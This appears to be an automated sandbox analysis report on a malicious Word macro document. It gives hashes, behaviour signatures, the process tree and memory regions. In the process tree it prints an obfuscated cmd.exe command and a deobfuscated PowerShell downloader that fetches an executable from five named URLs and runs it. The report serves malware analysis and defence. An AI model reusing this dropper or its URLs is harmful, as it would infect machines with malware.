Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-05-2024 18:19

General

  • Target

    5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    5ac1e88265ded3e67477cce519906e50

  • SHA1

    725f2a559f053ca645caa64f83e267f101474576

  • SHA256

    8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456

  • SHA512

    72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d

  • SSDEEP

    1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://www.knamanpower.com/U
    http://www.flanaganlaw.com/wkM
    http://lakecomoholidayapartments.com/uxbCg173
    http://farkop27.ru/uEEhY0
    http://juegosaleo.com/iu8xL5T1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ 
/^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4a1f0780af0683cca074813bbbb5a603

      SHA1

      31746c6651d897148ac881437232a2fe55ea1f0f

      SHA256

      53e9e5740a301a58dfa1b1e5a1a7c0608c0ad7b02725f6f77ff5305065cb41b6

      SHA512

      ab8fc7e6f1ca34782222cc2adacf0d2e01db07c11388cda19c4891bb5bca70da470385513bcc35ff0c59cdb93b126601a8005e16da7bb0c9ba499bf2274b3354

    • memory/1868-18-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-19-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-17-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-10-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-59-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-69-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-110-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-68-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-58-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-49-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-43-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-15-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-20-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

      Filesize

      4KB

    • memory/1868-6-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-2-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-27-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-16-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-14-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-13-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-12-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-11-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-9-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-8-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-7-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-122-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-123-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1868-139-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB